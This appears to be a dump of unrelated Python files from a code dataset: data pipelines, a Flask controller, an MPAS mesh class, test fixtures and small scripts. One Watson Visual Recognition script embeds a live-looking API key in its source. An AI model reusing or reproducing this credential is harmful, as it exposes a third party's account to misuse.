', '.join([t.name for t in f.tags.exclude(id=tag_logged.id)])\n\n if tags and f.description:\n description = '%s %s: %s' % (f.activity.name, tags, f.description)\n elif tags:\n description = '%s %s' % (f.activity.name, tags)\n elif f.description:\n description = '%s %s' % (f.activity.name, f.description)\n else:\n description = f.activity.name\n\n dp_task_id = settings.HAMSTER_TO_DP[f.category.name]\n\n #and post the fact into dotproject!\n br.log_task(dp_task_id, f.start_time, f.duration, description)\n\n #then mark the fact as logged.\n FactTag.objects.create(fact=f, tag=tag_logged)\n","sub_path":"h2dp/hamster/management/commands/loghours.py","file_name":"loghours.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"157942474","text":"import pandas as pd\nimport numpy as np\nimport json\nimport pytz\nimport datetime\n\nimport jobs\n\ndef get_df(raw, type):\n \n print(\"Constructing dataframe...\")\n \n df = pd.DataFrame()\n \n if type == 'allocations':\n df = pd.DataFrame()\n \n for block, data in raw.items():\n df_block = pd.json_normalize(data, sep='_')\n df_block['block'] = block\n \n df = pd.concat([df, df_block], sort=False)\n \n json_struct = json.loads(df.explode('subgraphDeployment_versions').to_json(orient=\"records\")) \n df = pd.json_normalize(json_struct, sep='_') #use pd.io.json\n \n else:\n\n for block, data in raw.items():\n \n df_block = pd.json_normalize(data, sep='_')\n df_block['block'] = block\n \n df = pd.concat([df, df_block], sort=False)\n\n return df\n\ndef clean_names(df, query):\n \n print(\"Cleaning column names...\")\n\n return df.rename(columns = jobs.columns_in[query])\n\ndef clean_data(df, query):\n \n print(\"Cleaning data formats...\")\n \n if query == 'main':\n\n df['created_at'] = pd.to_datetime(df['created_at'],unit='s')\n df['created_date'] = df['created_at'].dt.date\n df['signal'] = df['signal'].astype(float)/10**18\n df['curator_rewards_total'] = df['curator_rewards_total'].astype(float)/10**18\n df['indexer_rewards_total'] = df['indexer_rewards_total'].astype(float)/10**18\n df['delegator_rewards_total'] = df['delegator_rewards_total'].astype(float)/10**18\n df['QF_total'] = df['QF_total'].astype(float)/10**18\n df['shares'] = df['shares'].astype(float)/10**18\n df['stake'] = df['stake'].astype(float)/10**18\n df['price_per_share'] = df['price_per_share'].astype(float)\n \n 
elif query == 'global':\n \n df['stake'] = df['stake'].astype(float)/10**18\n df['delegation'] = df['delegation'].astype(float)/10**18\n df['allocation'] = df['allocation'].astype(float)/10**18\n df['QF_total'] = df['QF_total'].astype(float)/10**18\n df['curator_rewards_total'] = df['curator_rewards_total'].astype(float)/10**18\n df['indexer_rewards_total'] = df['indexer_rewards_total'].astype(float)/10**18\n df['delegator_rewards_total'] = df['delegator_rewards_total'].astype(float)/10**18\n df['signal'] = df['signal'].astype(float)/10**18 \n \n elif query == 'allocations':\n \n df['allocated_tokens'] = df['allocated_tokens'].astype(float)/10**18\n df['closed_at_block'] = df['closed_at_block'].fillna(0).astype(int)\n df['delegation_fees'] = df['delegation_fees'].astype(float)/10**18\n df['QF_collected'] = df['QF_collected'].astype(float)/10**18\n\n return df\n\ndef add_blocktimes(df, blocktimes):\n \n print(\"Adding blocktimes...\")\n \n df_blocktimes = pd.DataFrame(data=blocktimes, columns=['block', 'blockTime'])\n \n df = df.merge(df_blocktimes, on='block')\n #df['blockDatetime'] = pd.to_datetime(df['blockTime'],unit='s')\n df['date'] = pd.to_datetime(df['blockTime'],unit='s').dt.date\n \n return df\n\ndef rename(df, type):\n \n return df.rename(columns = jobs.rename[type])\n\ndef aggregate(df, type):\n \n print(\"Aggregating dataframe...\")\n \n if type == 'global':\n pass\n \n elif type == 'subgraphs':\n \n df_names = df[['display_name', 'subgraph_id']].drop_duplicates().copy().reset_index(drop=True)\n \n df = (df.groupby(['subgraph_id','block','date', 'created_at'])\n .agg(\n {\n 'active' : 'max',\n 'curator_rewards_total': 'sum',\n 'delegator_rewards_total': 'sum',\n 'indexer_rewards_total': 'sum',\n 'price_per_share' : 'max',\n 'QF_total': 'sum',\n 'shares' : 'max',\n 'signal': 'sum',\n 'stake': 'sum'\n }\n )\n .reset_index()\n .copy())\n \n df = df.merge(df_names, on=['subgraph_id'])\n \n return df\n\n \ndef add_columns(df, type):\n \n print(\"Adding new columns...\")\n \n if type == 'allocations':\n df['subgraph_id'] = df.apply(lambda x: x['version_id'][:-2] if x['version_id'] else None, axis = 1)\n \n elif type == 'global':\n \n # Adding diffs\n df['QF'] = df['QF_total'].diff().fillna(0)\n \n df['signal_change'] = df['signal'].diff().fillna(0)\n df['signal_change_7d'] = df['signal'].diff(periods=7).fillna(0)\n df['signal_change_30d'] = df['signal'].diff(periods=30).fillna(0)\n \n df['stake_change'] = df['stake'].diff().fillna(0)\n df['stake_change_7d'] = df['stake'].diff(periods=7).fillna(0)\n df['stake_change_30d'] = df['stake'].diff(periods=30).fillna(0)\n \n df['allocation_change'] = df['allocation'].diff().fillna(0)\n df['allocation_change_7d'] = df['allocation'].diff(periods=7).fillna(0)\n df['allocation_change_30d'] = df['allocation'].diff(periods=30).fillna(0)\n \n df['delegation_change'] = df['delegation'].diff().fillna(0)\n df['delegation_change_7d'] = df['delegation'].diff(periods=7).fillna(0)\n df['delegation_change_30d'] = df['delegation'].diff(periods=30).fillna(0)\n \n df['curator_rewards'] = df['curator_rewards_total'].diff().fillna(0)\n df['indexer_rewards'] = df['indexer_rewards_total'].diff().fillna(0)\n df['delegator_rewards'] = df['delegator_rewards_total'].diff().fillna(0)\n \n # Adding moving sums and averages (remember to sort!)\n df = df.sort_values(['date'], ascending=True).reset_index()\n \n df['QF_7d'] = df['QF'].rolling(7).sum()\n df['QF_30d'] = df['QF'].rolling(30).sum()\n df['curator_rewards_7d'] = df['curator_rewards'].rolling(7).sum()\n 
df['curator_rewards_30d'] = df['curator_rewards'].rolling(30).sum()\n df['indexer_rewards_7d'] = df['indexer_rewards'].rolling(7).sum()\n df['indexer_rewards_30d'] = df['indexer_rewards'].rolling(30).sum()\n df['delegator_rewards_7d'] = df['delegator_rewards'].rolling(7).sum()\n df['delegator_rewards_30d'] = df['delegator_rewards'].rolling(30).sum()\n \n # Arithmetic\n df['signal_per_stake'] = df['signal'] / df['allocation']\n df['QF30D_per_signal'] = df['QF_30d'] / df['signal']\n \n # APR estimates \n df_feesplit = pd.read_csv('outputs/allocations.csv')\n feesplit = df_feesplit['delegation_fees'].sum()/df_feesplit['QF_collected'].sum()\n \n df['curator_apr_30d_estimate'] = (df['curator_rewards_30d'] / df['signal'].rolling(30).mean()) * 12\n df['indexer_apr_30d_estimate'] = ((df['indexer_rewards_30d'] + (1-feesplit)* df['QF_30d']) / df['stake'].rolling(30).mean()) * 12\n df['delegator_apr_30d_estimate'] = ((df['delegator_rewards_30d'] + feesplit* df['QF_30d'])/ df['delegation'].rolling(30).mean()) * 12\n \n if type == 'subgraphs':\n \n df = df.sort_values(['subgraph_id', 'block'])\n \n # Adding diffs per subgraph per block interval\n\n df['QF'] = df.groupby('subgraph_id')['QF_total'].diff().fillna(0)\n df['signal_change'] = df.groupby('subgraph_id')['signal'].diff().fillna(0)\n df['stake_change'] = df.groupby('subgraph_id')['stake'].diff().fillna(0)\n df['shares_change'] = df.groupby('subgraph_id')['shares'].diff().fillna(0)\n df['price_change'] = df.groupby('subgraph_id')['price_per_share'].diff().fillna(0)\n df['curator_rewards'] = df.groupby('subgraph_id')['curator_rewards_total'].diff().fillna(0)\n df['indexer_rewards'] = df.groupby('subgraph_id')['indexer_rewards_total'].diff().fillna(0)\n df['delegator_rewards'] = df.groupby('subgraph_id')['delegator_rewards_total'].diff().fillna(0)\n \n # Rolling means and sums\n df['QF_7d'] = df.groupby('subgraph_id').rolling(7)['QF'].sum().reset_index(drop=True)\n df['QF_14d'] = df.groupby('subgraph_id').rolling(14)['QF'].sum().reset_index(drop=True)\n df['QF_30d'] = df.groupby('subgraph_id').rolling(30)['QF'].sum().reset_index(drop=True)\n \n df['signal_change_7d'] = df.groupby('subgraph_id').rolling(7)['signal_change'].sum().reset_index(drop=True)\n df['signal_change_14d'] = df.groupby('subgraph_id').rolling(14)['signal_change'].sum().reset_index(drop=True)\n df['signal_change_30d'] = df.groupby('subgraph_id').rolling(30)['signal_change'].sum().reset_index(drop=True)\n \n df['signal_7d_MA'] = df.groupby('subgraph_id').rolling(7)['signal'].mean().reset_index(drop=True)\n df['signal_14d_MA'] = df.groupby('subgraph_id').rolling(14)['signal'].mean().reset_index(drop=True)\n df['signal_30d_MA'] = df.groupby('subgraph_id').rolling(30)['signal'].mean().reset_index(drop=True)\n \n df['stake_change_7d'] = df.groupby('subgraph_id').rolling(7)['stake_change'].sum().reset_index(drop=True)\n df['stake_change_14d'] = df.groupby('subgraph_id').rolling(14)['stake_change'].sum().reset_index(drop=True)\n df['stake_change_30d'] = df.groupby('subgraph_id').rolling(30)['stake_change'].sum().reset_index(drop=True)\n \n df['stake_7d_MA'] = df.groupby('subgraph_id').rolling(7)['stake'].mean().reset_index(drop=True)\n df['stake_14d_MA'] = df.groupby('subgraph_id').rolling(14)['stake'].mean().reset_index(drop=True)\n df['stake_30d_MA'] = df.groupby('subgraph_id').rolling(30)['stake'].mean().reset_index(drop=True)\n \n df['shares_change_7d'] = df.groupby('subgraph_id').rolling(7)['shares_change'].sum().reset_index(drop=True)\n df['shares_change_14d'] = 
df.groupby('subgraph_id').rolling(14)['shares_change'].sum().reset_index(drop=True)\n df['shares_change_30d'] = df.groupby('subgraph_id').rolling(30)['shares_change'].sum().reset_index(drop=True)\n \n df['shares_7d_MA'] = df.groupby('subgraph_id').rolling(7)['shares'].mean().reset_index(drop=True)\n df['shares_14d_MA'] = df.groupby('subgraph_id').rolling(14)['shares'].mean().reset_index(drop=True)\n df['shares_30d_MA'] = df.groupby('subgraph_id').rolling(30)['shares'].mean().reset_index(drop=True)\n \n df['price_change_7d'] = df.groupby('subgraph_id').rolling(7)['price_change'].sum().reset_index(drop=True)\n df['price_change_14d'] = df.groupby('subgraph_id').rolling(14)['price_change'].sum().reset_index(drop=True)\n df['price_change_30d'] = df.groupby('subgraph_id').rolling(30)['price_change'].sum().reset_index(drop=True)\n \n df['price_7d_MA'] = df.groupby('subgraph_id').rolling(7)['price_per_share'].mean().reset_index(drop=True)\n df['price_14d_MA'] = df.groupby('subgraph_id').rolling(14)['price_per_share'].mean().reset_index(drop=True)\n df['price_30d_MA'] = df.groupby('subgraph_id').rolling(30)['price_per_share'].mean().reset_index(drop=True)\n \n df['curator_rewards_7d'] = df.groupby('subgraph_id').rolling(7)['curator_rewards'].sum().reset_index(drop=True)\n df['curator_rewards_14d'] = df.groupby('subgraph_id').rolling(14)['curator_rewards'].sum().reset_index(drop=True)\n df['curator_rewards_30d'] = df.groupby('subgraph_id').rolling(30)['curator_rewards'].sum().reset_index(drop=True)\n \n df['indexer_rewards_7d'] = df.groupby('subgraph_id').rolling(7)['indexer_rewards'].sum().reset_index(drop=True)\n df['indexer_rewards_14d'] = df.groupby('subgraph_id').rolling(14)['indexer_rewards'].sum().reset_index(drop=True)\n df['indexer_rewards_30d'] = df.groupby('subgraph_id').rolling(30)['indexer_rewards'].sum().reset_index(drop=True)\n \n df['delegator_rewards_7d'] = df.groupby('subgraph_id').rolling(7)['delegator_rewards'].sum().reset_index(drop=True)\n df['delegator_rewards_14d'] = df.groupby('subgraph_id').rolling(14)['delegator_rewards'].sum().reset_index(drop=True)\n df['delegator_rewards_30d'] = df.groupby('subgraph_id').rolling(30)['delegator_rewards'].sum().reset_index(drop=True)\n \n # Rates\n \n df['signal_per_stake'] = df['signal'] / df['stake']\n \n df['curator_rewards_per_signal_7d'] = df['curator_rewards_7d'] / df['signal_7d_MA']\n df['curator_rewards_per_signal_14d'] = df['curator_rewards_14d'] / df['signal_14d_MA']\n df['curator_rewards_per_signal_30d'] = df['curator_rewards_30d'] / df['signal_30d_MA']\n \n df['indexer_rewards_per_stake_7d'] = df['indexer_rewards_7d'] / df['stake_7d_MA']\n df['indexer_rewards_per_stake_14d'] = df['indexer_rewards_14d'] / df['stake_14d_MA']\n df['indexer_rewards_per_stake_30d'] = df['indexer_rewards_30d'] / df['stake_30d_MA']\n \n df['curator_apr_30d_estimate'] = df['curator_rewards_per_signal_30d'] * 12\n \n # Estimating indexer/delegator fee splits\n df_feesplit = pd.read_csv('outputs/allocations.csv')\n feesplit = df_feesplit['delegation_fees'].sum()/df_feesplit['QF_collected'].sum()\n \n df['indexer_apr_30d_estimate'] = (df['QF_30d'] * (1-feesplit) + df['indexer_rewards_30d']) / df['stake_30d_MA'] * 12\n \n df['price_growth_7d'] = -df['price_per_share'] / (df['price_change_7d'] - df['price_per_share']) - 1\n df['price_growth_14d'] = -df['price_per_share'] / (df['price_change_14d'] - df['price_per_share']) - 1\n df['price_growth_30d'] = -df['price_per_share'] / (df['price_change_30d'] - df['price_per_share']) - 1\n \n 
df['curator_rewards_per_share_30d'] = df['curator_rewards_30d'] / df['shares_30d_MA']\n #df['curator_rewards_per_share_squared_30d'] = df['curator_rewards_30d'] / (df['shares_30d_MA']*df['shares_30d_MA'])\n #df['price_per_reward_30d'] = df['price_per_share'] / df['curator_rewards_per_share_30d']\n \n \n df = df.replace([np.inf, -np.inf], np.nan)\n \n return df\n\ndef drop_rows(df, type):\n \n if type == 'allocations':\n \n #Drop all rows where closed_block is outside of the block interval\n df = df.loc[(df['closed_at_block'] >= df['block'].min()) & (df['closed_at_block'] <= df['block'].max())]\n \n return df\n \n\ndef pipeline(raw, blocktimes, job):\n \n if job.type == 'allocations':\n df = get_df(raw, job.type)\n df = clean_names(df, job.query)\n df = clean_data(df, job.query)\n df = add_columns(df, job.type)\n df = drop_rows(df, job.type)\n \n elif job.type == 'global':\n df = get_df(raw, job.type)\n df = clean_names(df, job.query)\n df = clean_data(df, job.query)\n df = add_blocktimes(df, blocktimes)\n df = add_columns(df, job.type)\n \n elif job.type == 'subgraphs':\n df = get_df(raw, job.type)\n df = clean_names(df, job.query)\n df = clean_data(df, job.query)\n df = add_blocktimes(df, blocktimes)\n \n df = aggregate(df, job.type)\n df = add_columns(df, job.type)\n #print(df.columns)\n #return None\n \n print(\"Saving local file...\")\n \n if job.type == 'allocations':\n \n #filedate = pytz.utc.localize(datetime.datetime.utcnow()).date().strftime('%m_%d_%Y')\n filename = f\"{job.filename}.csv\"\n df.to_csv(f'{job.output}/{filename}', columns=jobs.columns_out[job.type])\n \n else:\n filedate = df['date'].max().strftime('%m_%d_%Y')\n filename = f\"{job.filename}_{filedate}.csv\"\n\n (\n df\n .sort_values('date', ascending=True)\n .tail(job.rows).reset_index(drop=True)\n .to_csv(f'{job.output}/{filename}', columns=jobs.columns_out[job.type])\n )\n \n return filename, df","sub_path":"pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":15899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"241890210","text":"from flask_app import app\nfrom flask import render_template, redirect, request, session, flash\nfrom flask_app.models.model_poke import Poke\nfrom flask_app.models.model_user import User\n\n@app.route('/post/new')\ndef post_new():\n context = {\n 'user' : User.get_one(session['uuid'])[0]\n }\n return render_template('new_post.html', **context)\n\n@app.route('/post/create', methods=['POST'])\ndef post_create():\n is_valid = Poke.validate_post(request.form)\n if not is_valid:\n return redirect('/post/create')\n info = {\n **request.form,\n 'user_id' : session['uuid']\n }\n Poke.create(info)\n return redirect('/')\n\n@app.route('/post/<int:post_id>/delete')\ndef post_delete(post_id):\n post = Poke.get_one(post_id)\n if post['users_id'] == session['uuid']:\n Poke.delete_one(post_id)\n return redirect('/')\n\n@app.route('/post/<int:post_id>/edit')\ndef edit_post(post_id):\n post_id = Poke.get_one(post_id)\n context = {\n \"post\" : post_id,\n \"user\" : session['uuid']\n }\n return render_template('edit_post.html', **context)\n\n@app.route('/post/<int:post_id>/update', methods=['POST'])\ndef update_post(post_id):\n is_valid = Poke.validate_post(request.form)\n if not is_valid:\n return redirect('/post/<int:post_id>/edit')\n info = {\n \"location\": request.form['location'],\n \"date\": request.form['date'],\n \"content\": request.form['content'],\n \"num_of_sas\": request.form['num_of_sas'],\n \"id\" : post_id\n 
}\n    Poke.update_one(info)\n    url = f'/post/{post_id}/edit'\n    return redirect(url)\n\n@app.route('/post/<int:post_id>/view')\ndef view_post(post_id):\n    post_id = Poke.get_one(post_id)\n    user_name = Poke.get_name_by_post(post_id['users_id'])[0]\n    context = { \n        \"post\" : post_id,\n        \"user_name\" : user_name\n    }\n    return render_template('view_post.html', **context)","sub_path":"flask_app/controllers/controller_poke.py","file_name":"controller_poke.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"628620810","text":"\"\"\"\nMake sure settings.yaml is valid yaml\n\"\"\"\n\nimport os\nimport yaml\n\n\ndef test_valid_syntax():\n    \"\"\"Actually check the yaml file\"\"\"\n    fname = os.path.join(\n        os.path.dirname(os.path.dirname(__file__)),\n        'settings.yaml'\n    )\n\n    with open(fname) as conf:\n        yaml.safe_load(conf)\n","sub_path":"make-release/tests/test_makereleaseyaml.py","file_name":"test_makereleaseyaml.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"396223279","text":"import json\nfrom watson_developer_cloud import VisualRecognitionV3\n\nvisual_recognition = VisualRecognitionV3(\n    '2018-03-04',\n    api_key='f8d4b7808571deb16cbd5e74ba6e446a1922a959'\n)\n\n\nwith open('./hqdefault.jpg', 'rb') as images_file:\n    classes = visual_recognition.classify(\n        images_file,\n        parameters=json.dumps({\n\n        }))\nprint(json.dumps(classes, indent=2))\n","sub_path":"watsonclass.py","file_name":"watsonclass.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"466086576","text":"\n\nimport json\nfrom json import JSONEncoder\nimport numpy as np\nfrom pyflowline.classes.vertex import pyvertex\nfrom pyflowline.classes.edge import pyedge\nfrom pyflowline.classes.cell import pycell\nfrom pyflowline.classes.flowline import pyflowline\nfrom pyflowline.external.pyearth.gis.gdal.gdal_functions import calculate_polygon_area\n\nclass MpasClassEncoder(JSONEncoder):\n    def default(self, obj):\n        if isinstance(obj, np.integer):\n            return int(obj)\n        if isinstance(obj, np.float32):\n            return float(obj)\n        if isinstance(obj, np.ndarray):\n            return obj.tolist()\n        if isinstance(obj, list):\n            pass \n        if isinstance(obj, pyvertex):\n            return json.loads(obj.tojson()) #lVertexID\n        if isinstance(obj, pyedge):\n            return obj.lEdgeID \n        if isinstance(obj, pyflowline):\n            return obj.lFlowlineID\n        \n        if isinstance(obj, pympas):\n            return obj.lCellID\n        \n        return JSONEncoder.default(self, obj)\n\n\n\nclass pympas(pycell):\n    \"\"\"\n    The MPAS cell class\n\n    Args:\n        pycell (object): None\n\n    Returns:\n        pympas: A mpas cell object\n    \"\"\"\n    lCellID = -1 \n    nFlowline=0\n    nVertex =0 \n    nEdge=0\n    dLength=0.0\n    dArea=0.0\n    dX_center_meter=0.0\n    dY_center_meter=0.0\n    dz_center=0.0\n    dLongitude_center_degree=0.0\n    dLatitude_center_degree=0.0\n    dElevation_mean=0.0\n    dElevation_profile0=0.0\n    dLength_flowline=0.0\n    iFlag_intersected=-1\n    iFlag_coast = 0\n    lCellID_downstream_burned=-1\n    iStream_order_burned=-1\n    iStream_segment_burned=-1\n    aEdge=None\n    aEdgeID=None\n    aVertex=None\n    aVertexID=None\n    pVertex_center = None\n    aFlowline=None \n    nNeighbor=-1 \n    nNeighbor_land=-1\n    nNeighbor_land_virtual = -1\n    aNeighbor_land_virtual = None\n    nNeighbor_ocean=-1\n    aNeighbor=None #the global ID of all neighbors, excluding null\n    
aNeighbor_land=None #the global ID of all neighbors\n \n aNeighbor_ocean=None #the global ID of all neighbors\n aNeighbor_distance = None\n \n\n def __init__(self, dLon, dLat, aEdge, aVertex):\n \"\"\"\n Initilize a mpas cell object\n\n Args:\n dLon (float): The longitude of center \n dLat (float): The latitude of center \n aEdge (list [pyedge]): A list of edges that define the hexagon\n aVertex (list [pyvertex]): A list of vertices the define the hexagon\n \"\"\"\n\n nEdge = len(aEdge)\n if nEdge < 3 or nEdge > 9:\n print('At lease 3 edges are required!', nEdge)\n pass\n else: \n self.aEdge = aEdge\n self.aVertex = aVertex #the first one and last one are the same\n self.nEdge = len(aEdge)\n self.nVertex = len(aVertex) \n #initialize the neighbor but without the actual neighbor information\n self.nNeighbor = -1\n self.nNeighbor_land = -1\n self.nNeighbor_land_virtual = -1\n self.nNeighbor_ocean = -1\n self.iFlag_coast = 0 \n self.dLongitude_center_degree = dLon\n self.dLatitude_center_degree = dLat\n pVertex = dict() \n pVertex['dLongitude_degree'] =self.dLongitude_center_degree\n pVertex['dLatitude_degree'] =self.dLatitude_center_degree \n self.pVertex_center = pyvertex(pVertex)\n self.lCellID_downstream_burned=-1\n self.iStream_order_burned=-1\n self.iStream_segment_burned=-1\n self.dElevation_mean=-9999.0\n self.dElevation_profile0=-9999.0\n pass\n pass\n \n \n def has_this_edge(self, pEdge_in):\n \"\"\"\n Check whether the cell contains an edge\n\n Args:\n pEdge_in (pyedge): the to be checked edge\n\n Returns:\n int: 1 if contains; or else 0\n \"\"\"\n iFlag_found = 0\n for pEdge in self.aEdge:\n if pEdge.is_overlap(pEdge_in):\n iFlag_found =1 \n break\n else:\n pass \n \n return iFlag_found\n\n def which_edge_cross_this_vertex(self, pVertex_in):\n \"\"\"\n When a flowline intersects with a cell, this function finds out which edge is intersected\n\n Args:\n pVertex_in (pyvertex): the intersected vertex\n\n Returns:\n tuple: (1, edge) if contains; or else (0, None) \n \"\"\"\n iFlag_found = 0\n pEdge_out = None\n for pEdge in self.aEdge:\n iFlag, dummy ,diff = pEdge.check_vertex_on_edge(pVertex_in)\n if( iFlag ==1 ):\n iFlag_found =1\n pEdge_out = pEdge\n break\n else:\n pass\n\n return iFlag_found, pEdge_out\n \n def calculate_cell_area(self):\n \"\"\"\n Calculate the area of a cell, this function is not used for mpas cell\n\n Returns:\n float: cell area\n \"\"\"\n lons=list()\n lats=list() \n for i in range(self.nVertex): \n lons.append( self.aVertex[i].dLongitude_degree )\n lats.append( self.aVertex[i].dLatitude_degree )\n\n self.dArea = calculate_polygon_area(lons,lats )\n return self.dArea\n\n def calculate_edge_length(self):\n \"\"\"\n Calculate the effective cell length/resolution\n\n Returns:\n float: effective cell length/resolution\n \"\"\"\n self.dLength_edge = np.sqrt( self.dArea )\n return self.dLength_edge\n \n def share_edge(self, other):\n \"\"\"\n Check if two cells share an edge\n\n Args:\n other (pympas): the other cell\n\n Returns:\n int: 1 if shared, 0 if not\n \"\"\"\n iFlag_share = 0\n for pEdge in self.aEdge:\n for pEdge2 in other.aEdge:\n if pEdge.is_overlap(pEdge2) ==1 :\n iFlag_share = 1 \n break\n\n return iFlag_share\n\n \n def tojson(self):\n \"\"\"\n Convert a cell into a json string\n\n Returns:\n json str: A json string\n \"\"\"\n aSkip = ['aEdge', \\\n 'aFlowline']\n obj = self.__dict__.copy()\n for sKey in aSkip:\n obj.pop(sKey, None)\n sJson = json.dumps(obj, \\\n sort_keys=True, \\\n indent = 4, \\\n ensure_ascii=True, \\\n cls=MpasClassEncoder)\n 
return sJson\n","sub_path":"pyflowline/classes/mpas.py","file_name":"mpas.py","file_ext":"py","file_size_in_byte":6562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"170399716","text":"def longestPalSubstr(string): \r\n\r\n maxLength = 1; start = 0; length = len(string) \r\n low = 0; high = 0 \r\n\r\n # One by one consider every character as center point of even length palindromes \r\n\r\n for i in range(1, length): \r\n\r\n # Find the longest even length palindrome with center points as i-1 and i. \r\n\r\n low = i - 1 \r\n high = i \r\n\r\n while low >= 0 and high < length and string[low] == string[high]: \r\n\r\n if high - low + 1 > maxLength: \r\n\r\n start = low \r\n\r\n maxLength = high - low + 1 \r\n\r\n low -= 1 \r\n high += 1 \r\n\r\n # Find the longest odd length palindrome with center point as i \r\n\r\n low = i - 1 \r\n high = i + 1 \r\n\r\n while low >= 0 and high < length and string[low] == string[high]: \r\n\r\n if high - low + 1 > maxLength: \r\n\r\n start = low \r\n\r\n maxLength = high - low + 1 \r\n\r\n low -= 1 \r\n high += 1 \r\n \r\n\r\n print (string[start:start + maxLength]) \r\n\r\n return maxLength\r\n\r\nstring = 'babbad'\r\nlongestPalSubstr(string)\r\n","sub_path":"string_LongestPalidrome.py","file_name":"string_LongestPalidrome.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"287137010","text":"#!/usr/bin/env python3\nfrom serialize import to_json\n\n\n################################################\n### Testing objects\n\nclass Date(object):\n '''A date for a person'''\n def __init__(self, year, month, day):\n self.year = year\n self.month = month\n self.day = day\n\n\nclass Franchise(object):\n '''A franchise.'''\n def __init__(self, name, owner, started):\n self.name = name\n self.owner = owner\n self.started = started\n\n\nclass Person(object):\n '''A person'''\n def __init__(self, name, gender, birth_date, is_cool, net_worth, debut_year, father, mother, franchise):\n self.name = name\n self.gender = gender\n self.birth_date = birth_date\n self.is_cool = is_cool\n self.net_worth = net_worth\n self.debut_year = debut_year\n self.father = father\n self.mother = mother\n self.franchise = franchise\n\n\n\n################################################\n### Main method\n\nif __name__ == '__main__':\n # person 1\n fd1 = Date(1962, 8, 1)\n f1 = Franchise('Spiderman', 'Marvel', fd1)\n b1 = Date(2011, 2, 3)\n p1 = Person('Peter \"Spidey\" Parker', 'M', b1, False, 15000.00, 1967, None, None, f1)\n\n # person 2\n fd2 = Date(1962, 8, 1)\n f2 = Franchise('Superman', 'DC\\\\Comics', fd2)\n b2 = Date(2014, 5, 6)\n p2 = Person('Lois Lane', 'F', b2, True, 40000.50, 1981, None, None, f2)\n\n # person 3\n fd3 = Date(1963, 1, 1)\n f3 = Franchise('Doctor Who', 'BBC', fd3)\n b3 = Date(2017, 8, 9)\n p3 = Person('River Song/Melody Pond', 'F', b3, True, 91234.56, 2001, p1, p2, f3)\n\n # print\n to_json(p3)\n # print(to_json(p3))\n","sub_path":"reflection/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"546085996","text":"\"\"\"\nA module containing testing utilities and fixtures.\n\"\"\"\nimport os\nimport re\nimport shutil\nimport signal\nimport tempfile\nimport time\n\nfrom contextlib import contextmanager\nfrom subprocess import PIPE, Popen\n\nimport pytest\n\nfrom bokeh.client import 
pull_session\nfrom bokeh.document import Document\nfrom bokeh.model import Model\nfrom pyviz_comms import Comm\n\nfrom panel import config, serve\nfrom panel.config import panel_extension\nfrom panel.io import state\nfrom panel.pane import HTML, Markdown\n\n\ndef pytest_addoption(parser):\n parser.addoption('--ui', action='store_true', dest=\"ui\",\n default=False, help=\"enable UI tests\")\n\ndef pytest_configure(config):\n config.addinivalue_line(\n \"markers\", \"ui: mark as UI test\"\n )\n if config.option.ui:\n if getattr(config.option, 'markexpr', None):\n config.option.markexpr += ' and not ui'\n else:\n setattr(config.option, 'markexpr', 'ui')\n else:\n setattr(config.option, 'markexpr', 'not ui')\n\n@pytest.fixture\ndef context(context):\n # Set the default timeout to 20 secs\n context.set_default_timeout(20_000)\n yield context\n\nPORT = [6000]\n\n@pytest.fixture\ndef document():\n return Document()\n\n\n@pytest.fixture\ndef comm():\n return Comm()\n\n\n@pytest.fixture\ndef port():\n PORT[0] += 1\n return PORT[0]\n\n\n@pytest.fixture\ndef dataframe():\n import pandas as pd\n return pd.DataFrame({\n 'int': [1, 2, 3],\n 'float': [3.14, 6.28, 9.42],\n 'str': ['A', 'B', 'C']\n }, index=[1, 2, 3], columns=['int', 'float', 'str'])\n\n\n@pytest.fixture\ndef hv_bokeh():\n import holoviews as hv\n hv.renderer('bokeh')\n prev_backend = hv.Store.current_backend\n hv.Store.current_backend = 'bokeh'\n yield\n hv.Store.current_backend = prev_backend\n\n\n@pytest.fixture\ndef get_display_handle():\n cleanup = []\n def display_handle(model):\n cleanup.append(model.ref['id'])\n handle = {}\n state._handles[model.ref['id']] = (handle, [])\n return handle\n yield display_handle\n for ref in cleanup:\n if ref in state._handles:\n del state._handles[ref]\n\n\n@pytest.fixture\ndef hv_mpl():\n import holoviews as hv\n hv.renderer('matplotlib')\n prev_backend = hv.Store.current_backend\n hv.Store.current_backend = 'matplotlib'\n yield\n hv.Store.current_backend = prev_backend\n\n\n@pytest.fixture\ndef tmpdir(request, tmpdir_factory):\n name = request.node.name\n name = re.sub(r\"[\\W]\", \"_\", name)\n MAXVAL = 30\n if len(name) > MAXVAL:\n name = name[:MAXVAL]\n tmp_dir = tmpdir_factory.mktemp(name, numbered=True)\n yield tmp_dir\n shutil.rmtree(str(tmp_dir))\n\n\n@pytest.fixture()\ndef html_server_session():\n html = HTML('<h1>Title</h1>')\n server = serve(html, port=6000, show=False, start=False)\n session = pull_session(\n session_id='Test',\n url=\"http://localhost:{:d}/\".format(server.port),\n io_loop=server.io_loop\n )\n yield html, server, session\n try:\n server.stop()\n except AssertionError:\n pass # tests may already close this\n\n\n@pytest.fixture()\ndef markdown_server_session():\n html = Markdown('#Title')\n server = serve(html, port=6001, show=False, start=False)\n session = pull_session(\n session_id='Test',\n url=\"http://localhost:{:d}/\".format(server.port),\n io_loop=server.io_loop\n )\n yield html, server, session\n try:\n server.stop()\n except AssertionError:\n pass # tests may already close this\n\n\n@pytest.fixture\ndef multiple_apps_server_sessions():\n \"\"\"Serve multiple apps and yield a factory to allow\n parameterizing the slugs and the titles.\"\"\"\n servers 